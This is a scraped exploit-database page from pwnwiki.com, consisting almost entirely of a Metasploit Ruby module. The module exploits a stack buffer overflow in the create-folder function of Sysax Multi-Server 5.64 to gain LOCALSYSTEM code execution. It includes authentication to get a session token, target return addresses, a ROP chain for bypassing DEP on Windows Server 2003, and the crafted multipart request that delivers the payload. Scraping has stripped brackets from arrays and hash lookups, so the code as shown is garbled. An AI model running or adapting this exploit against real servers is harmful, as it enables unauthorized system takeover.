Loading
0

Sysax Multi-Server 5.64 Create Folder 缓冲区溢出漏洞

PWNWIK.COM

,

EXP

require 'msf/core'
require 'base64'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'  => 'Sysax Multi Server 5.64 Create Folder BoF',
   'Description' => %q{
     This module exploits a stack buffer overflow in the create folder function
     in Sysax Multi Server 5.64. This issue was fixed in 5.66.

     You must have valid credentials to trigger the vulnerability. Your credentials
     must also have the create folder permission and the HTTP option has to be enabled.
     This module will log into the server, get your a SID token and then proceed to exploit
     the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
     XP SP3, and Server 2003 SP1-SP2.
   },
   'License' => MSF_LICENSE,
   'Author' =>
    
     'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64
     'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50
    ,
   'Version' => '$Revision:$',
   'References' =>
    
      'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' , # 5.64 update
      'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' , # 5.50 post
    ,
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Platform' => 'win',
   'Payload' =>
    {
     'BadChars' => "\x00\x2F",
    },

   'Targets'  =>
    
      'Windows XP SP3',
      {
       'Rop'  => false,
       'Ret'  => 0x77c35459, # push esp #  ret sysaxd.exe
       'Offset' => 701,
      }
     ,
      'Windows 2003 SP1-SP2 DEP & ASLR Bypass',
      {
       'Rop'  => true,
       'Ret'  => 0x77baf605, # pivot
       'Offset' => 701,
       'Nop'  => 0x77bd7d82, # RETN (ROP NOP) msvcrt.dll
      }
     ,
    ,
   'Privileged' => false,
   'DisclosureDate'=> 'July 29, 2012',
   'DefaultTarget' => 0))

  register_options(
    
     OptString.new('URI', false, "URI for Multi Server", '/'),
     Opt::RPORT(80),
     OptString.new('SysaxUSER',  true, "Username" ),
     OptString.new('SysaxPASS',  true, "Password" )
    , self.class)
  
 end

 def target_url
  "http://#{rhost}:#{rport}#{datastore'URI'}"
 end

 def create_rop_chain()
  rop_gadgets = 
  # All rop gadgets generated by mona.py
  # Thanks corelanc0d3r for making such a great tool

  if (target == targets1) # Windows 2003
   rop_gadgets =
   
    0x77be3adb, # POP EAX # RETN msvcrt.dll
    0x77ba1114, # ptr to &VirtualProtect() IAT msvcrt.dll
    0x77bbf244, # MOV EAX,DWORD PTR DS:EAX # POP EBP # RETN msvcrt.dll
    0x41414141, # Filler (compensate)
    0x77bb0c86, # XCHG EAX,ESI # RETN msvcrt.dll
    0x77bdb896, # POP EBP # RETN msvcrt.dll
    0x77be2265, # & push esp #  ret  msvcrt.dll
    0x77bdeebf, # POP EAX # RETN msvcrt.dll
    0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
    0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN msvcrt.dll
    0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN msvcrt.dll
    0x77bdf0da, # POP EAX # RETN msvcrt.dll
    0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
    0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN msvcrt.dll
    0x77bb8285, # XCHG EAX,EDX # RETN msvcrt.dll
    0x77bcc2ee, # POP ECX # RETN msvcrt.dll
    0x77befbb4, # &Writable location msvcrt.dll
    0x77bbf75e, # POP EDI # RETN msvcrt.dll
    0x77bd7d82, # RETN (ROP NOP) msvcrt.dll
    0x77bdf0da, # POP EAX # RETN msvcrt.dll
    0x90909090, # nop
    0x77be6591, # PUSHAD # ADD AL,0EF # RETN msvcrt.dll
   .flatten.pack("V*")
  end

  return rop_gadgets

 end

 def exploit
  
  user = datastore'SysaxUSER'
  pass = datastore'SysaxPASS'
  
  #base64 encode the credentials
  encodedcreds = Base64.encode64(user+"\x0a"+pass)
  creds = "fd="+encodedcreds

  connect

  # Login to get SID value
  print_status "Getting SID from #{target_url}"
  res = send_request_raw({
   'method'=> 'POST',
   'uri' => "#{target_url}/scgi?sid=0&pid=dologin",
   'data'  => creds
  },20)
  
  #parse response for SID token
  sid = res.body.match (/(sid=A-Z0-9a-z{40})/)
  print_status "Your " + sid.to_s

  buffer = rand_text(target'Offset')
  buffer << target.ret.pack('V')

  if (target'Rop')
   buffer << target'Nop'.pack('V')*16
   buffer << create_rop_chain()
  end

  buffer << make_nops(15)
  buffer << payload.encoded #max 1299 bytes
  
  #pwnag3 post data
  post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
  post_data << "Content-Length: 171\r\n\r\n"
  post_data << "-----------------------------1190753071675116720811342231\r\n"
  post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
  post_data << buffer+"\r\n"
  post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n"
  
  referer = "http://"+datastore'RHOST'.to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm"
    
  send_request_raw({
   'uri'     => "/" + post_data,
   'version' => '1.1',
   'method'  => 'POST',
   'referer' => referer
  })

  handler
  disconnect

 end
end

pwnwiki.com